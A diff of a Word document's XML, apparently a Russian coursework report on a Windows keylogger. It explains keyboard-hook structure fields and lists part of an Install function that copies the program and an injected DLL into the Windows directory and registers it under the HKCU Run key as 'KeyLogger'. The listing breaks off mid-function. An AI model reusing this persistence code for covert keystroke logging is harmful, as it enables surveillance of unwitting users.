+        </w:rPr>
+        <w:t>клавиши</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Код должен быть значением в диапазоне 1 - 254.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>DWORD</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>scanCode устанавливает аппаратный код опроса</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> клавиатуры (скэн-код) клавиши.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>DWORD</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>f</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>lags устанавливает флажок дополнительной клавиши, флажок события ввода, контекстный код и флажок переходного состояния.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>DWORD</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ime у</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>станавливает отмет</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ку времени для этого сообщения.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ULONG</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>_</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>PTR</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>dwExtraInfo</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>у</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>станавливает дополнительную информацию, связанную с сообщением.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="708"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>5.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">3 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Процедура </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">установки программы </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="708"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Для </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">установки приложения была разработана функция </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>bool Install(char* injectionDllName)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>. – копирует исполняемый файл и инжектируемую библиотеку в директорию операционной системы и устанавливает программу в автозагрузку</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Возвращает значение </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>true</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">при успешной установке, при ошибке возвращает значение </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>false</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>injectionDllName</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>имя инжектируемой библиотеки, которая должна находится рядом с исполняемым файлом.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:tabs>
-          <w:tab w:val="left" w:pos="2355"/>
+          <w:tab w:val="left" w:pos="3525"/>
         </w:tabs>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
-          <w:sz w:val="12"/>
-          <w:szCs w:val="12"/>
-        </w:rPr>
+        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="708"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">5.3.1 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Листинг</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>функции</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Install</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="240"/>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>bool Install(char* injectionDllName)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>HKEY hk;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>char currentPath[MAX_PATH],</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>sysbuf[MAX_PATH],</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>*fileName;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>GetModuleFileName(GetModuleHandle(NULL), currentPath, MAX_PATH);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>fileName = strrchr(currentPath, '\\');</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>GetWindowsDirectory(sysbuf, MAX_PATH);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>strcat(sysbuf, fileName);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>if (!CopyFile(currentPath, sysbuf, false))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>std::cout &lt;&lt; "Error: Can't copy file:" &lt;&lt; std::endl;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>std::cout &lt;&lt; sysbuf &lt;&lt; std::endl;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>return false;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
         <w:t>}</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:jc w:val="both"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-      </w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>if (ERROR_SUCCESS == RegCreateKey(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", &amp;hk))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>RegSetValueEx(hk, "KeyLogger", 0, REG_SZ, (LPBYTE) sysbuf, strlen(sysbuf));</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="708"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
